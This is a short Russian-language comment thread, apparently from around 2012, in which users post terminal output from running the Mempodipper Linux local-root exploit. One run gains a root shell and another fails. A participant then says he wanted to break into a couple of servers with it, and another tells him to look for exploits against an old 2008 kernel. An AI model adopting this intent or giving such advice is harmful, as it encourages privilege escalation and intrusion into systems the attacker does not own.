-
blog.zx2c4.com FFFFFFFUUUUUUUuuuuu
-
@zamotivator,
xl0@bzz:~$ ./a.out
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/12721/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x401fa8.
[+] Calculating su padding.
[+] Seeking to offset 0x401f9c.
[+] Executing su with shellcode.
# whoami
root
# -
@xl0, не работает
oleg.tsarev (0) ~$ sudo chown root:root ./a.out
oleg.tsarev (0) ~$ ./a.out
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/19045/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x1e88.
[+] Calculating su padding.
[+] Seeking to offset 0x1e7f.
[+] Executing su with shellcode.
oleg.tsarev (0) ~$ whoami
oleg.tsarev
oleg.tsarev (0) ~$ ls -al | grep a.out
-rwxrwxr-x. 1 root root 12803 Jan 23 20:49 a.out
oleg.tsarev (0) ~$ -
@xl0, тогда неинтересно. Я как раз хотел трахнуть пару серваков, и облом
-
@zamotivator, Ты полуркай, если оно собрано в 2008, стопудово будут к нему ксплойты.